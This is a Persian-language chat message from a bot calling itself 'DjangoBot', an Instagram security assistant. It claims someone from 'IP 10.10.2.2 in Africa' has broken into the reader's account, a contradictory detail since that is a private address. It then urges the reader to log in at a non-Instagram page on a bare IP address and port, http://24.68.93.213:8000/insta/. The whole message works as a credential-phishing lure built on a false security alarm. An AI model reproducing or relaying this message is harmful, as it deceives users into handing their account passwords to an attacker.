سلام! من کی ام؟ ربات امنیتی DjangoBot که سعی میکنه افراد موجود داخل اینستاتو پیدا کنه و اطلاعات لازم رو جهت اقدامات امنیتی میگم!
من فیک هستم؟ اره و نه! من یه رباتم و سازندم @clips هست. هر سوالی باشه اگه به من بگی مستقیم توسط سرور Instagram جوابتو میدم!
تمومی اطلاعاتت برای خودته و کسی دیگه ای اجازه ی استفاده از اطلاعات ردوبدل شده بین ربات و شما ندارد!

فعالیت های خارجی مشکوک : 
-------------------------------------------

در حال گرفتن دیتا از instagram.com

-------------------------------------------
شخصی یا آیپی 10.10.2.2 و از محدوده Africa وارد اکانت شما شده است.
خطرها: با توجه به فعالیت های آسیب پذیر, هرکسی میتواند وارد اکانت شما بدون نیاز به داشتن پسوورد بشود!
اقدامات لازم‌‌: وارد اکانتتون داخل سایت ربات اینستا شوید تا ربات به صورت خودکار شخص مزاحم را کیک کند و سابقه ی فعالیت های آسیب پذیر را پاک کند!
http://24.68.93.213:8000/insta/
در داخل اینترنت خود کپی کرده و وارد اکانت خود شوید.
اقدامات اختیاری‌: ---

برای ارتباط با ادمین ربات امنیتی, تایپ کنید ( کمک )

-------------------------------------------



در حال برقرای ارتباط با ادمین...

-------------------------------------------

